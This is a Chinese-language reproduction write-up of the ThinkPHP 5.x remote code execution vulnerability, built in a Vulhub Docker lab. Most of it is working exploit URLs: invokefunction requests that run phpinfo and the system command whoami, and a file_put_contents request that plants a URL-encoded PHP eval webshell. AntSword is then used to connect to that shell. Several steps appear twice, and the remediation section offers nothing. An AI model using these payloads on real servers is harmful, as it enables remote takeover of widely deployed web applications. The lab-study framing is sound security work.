一、漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。
二、影响版本
- ThinkPHP 5.0系列 < 5.0.23
- ThinkPHP 5.1系列 < 5.1.31
三、漏洞环境搭建
- cd /vulhub-master/thinkphp/5-rce
- docker-compose up -d
- 访问192.168.110.134:8080,出现如下界面,即为搭建成功:
- cd /vulhub-master/thinkphp/5-rce
- docker-compose up -d
- 访问192.168.110.134:8080,出现如下界面,即为搭建成功:
四、漏洞利用
- 命令执行:产看phpinfo()界面:
/index.php?s=index/thinkapp/invokefunction&function=phpinfo&vars[0]=100
- 命令执行,执行系统命令:
/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
五、写入webshell
5.1 手动写入webshell
- 写入webshell,命令准备
/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
%3C%3Fphp%20%40eval(%24_POST%5B'cmd'%5D)%3B%3F%3E
- 写入webshell,命令准备
/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
%3C%3Fphp%20%40eval(%24_POST%5B'cmd'%5D)%3B%3F%3E
写入完成之后,会显示这个界面,应该是。
- 因为是自己搭建的环境,可以尝试进入docker容器查看文件是否写入:
- 访问shell.php
- 蚁剑连接webshell
5.2 第三方漏洞利用工具检测
- 漏洞检测
- 命令执行
- getshell
- webshell工具连接,同样利用成功。
六、漏洞修复
不知道
